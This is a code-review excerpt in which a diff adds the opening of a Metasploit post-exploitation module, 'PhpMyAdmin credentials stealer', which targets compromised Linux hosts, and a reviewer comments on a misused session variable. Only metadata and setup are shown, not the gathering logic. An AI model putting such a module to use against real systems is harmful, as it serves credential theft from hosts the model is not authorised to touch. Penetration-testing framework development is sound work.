modules/post/linux/gather/phpmyadmin_credsteal.rb

```diff
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'         => "PhpMyAdmin credentials stealer",
+      'Description'  => %q{
+        This module gathers PhpMyAdmin Creds from Target Linux machine.
+      },
+      'License'      => MSF_LICENSE,
+      'Platform'     => ['linux'],
+      'SessionTypes' => ['meterpreter'],
+      'Arch'         => 'x86_x64',
+      'Privileged'   => 'true',
+      'References'   =>
+        [
+          [ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
+
+        ],
+      'Author'               => [
+        'Chaitanya Haritash [bofheaded]',
+        'Dhiraj Mishra <dhiraj@notsosecure.com>'
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('SESSION', [ true, 'The session number to run this module on'])
+      ])
+   end
+
+  def run
+
+    sess = client
```

Comment:
This should probably be removed. The only place it's used is in the call to `store_loot`, and that appears to have been in error. It should be `session`.